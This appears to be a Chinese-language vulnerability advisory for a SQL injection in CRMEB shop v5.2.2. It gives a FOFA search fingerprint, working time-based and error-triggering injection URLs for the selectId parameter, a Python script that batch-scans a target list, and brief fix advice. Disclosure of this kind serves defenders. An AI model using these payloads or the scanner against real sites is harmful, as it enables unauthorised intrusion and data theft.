
CRMEB开源商城v5.2.2存在sql注入漏洞

CRMEB v5.2.2 存在 SQL 注入漏洞：远程攻击者可通过 ProductController.php 文件中的 getProductList 函数获取敏感信息。从下文 PoC 可以看出，注入点是 /api/products 接口的 selectId 参数。排查与修复时，应对该参数做严格的整数校验并改用参数绑定查询，同时关闭生产环境的详细数据库报错输出。

fofa

icon_hash="-847565074"

poc

/api/products?limit=20&priceOrder=&salesOrder=&selectId=)
/api/products?limit=20&priceOrder=&salesOrder=&selectId=0*if(now()=sysdate(),sleep(6),0) 

image-20240616153608225

image-20240616153711514

import requests
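def check_vulnerability(url):
    """Probe one CRMEB base URL for the ``selectId`` SQL error signature.

    Sends a single GET to ``/api/products`` with a malformed ``selectId``
    value and checks whether the response body contains the string
    ``PDOConnection.php`` (presumably part of a leaked database error
    trace -- confirm against a known-affected instance).

    The verdict is printed; nothing is returned. A response without the
    marker only shows that the marker was not observed. An instance that
    suppresses error output would not show it either, so that case is
    reported as NOT DETECTED rather than as safe.

    Args:
        url: Base URL of the instance, including the scheme. Trailing
            slashes are ignored.
    """
    base_url = url.rstrip('/')
    test_url = f"{base_url}/api/products?limit=20&priceOrder=&salesOrder=&selectId=)"
    try:
        # Bound the request so one unresponsive host cannot stall the whole run.
        response = requests.get(test_url, timeout=10)
    except requests.RequestException as e:
        # Report the cause: a timeout, a TLS failure and a refused connection
        # call for different follow-up.
        print(f"\033[33m[ERROR]\033[0m Could not connect to {base_url}. Error: {e}")
        return

    if 'PDOConnection.php' in response.text:
        print(f"\033[31m[HIGH RISK]\033[0m Vulnerability found in: {base_url}")
    else:
        print(f"\033[32m[NOT DETECTED]\033[0m No SQL error marker in response from: {base_url}")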
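def main():
    """Check every target listed in ``url.txt``, one target per line.

    Blank lines are skipped. Entries without an explicit ``http://`` or
    ``https://`` scheme get ``http://`` prepended before they are passed
    to ``check_vulnerability``.
    """
    # Read the whole list first so the file is closed before any request is sent.
    with open('url.txt', 'r') as file:
        targets = [line.strip() for line in file]

    for url in targets:
        if not url:
            # A blank line would otherwise become the bare target "http://".
            continue
        # Test for a real scheme prefix: a bare hostname that merely starts
        # with "http" still needs one.
        if not url.lower().startswith(('http://', 'https://')):
            url = 'http://' + url
        check_vulnerability(url)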
# Run the scan only when this file is executed as a script, not when imported.
if __name__ == "__main__":
    main()

漏洞来源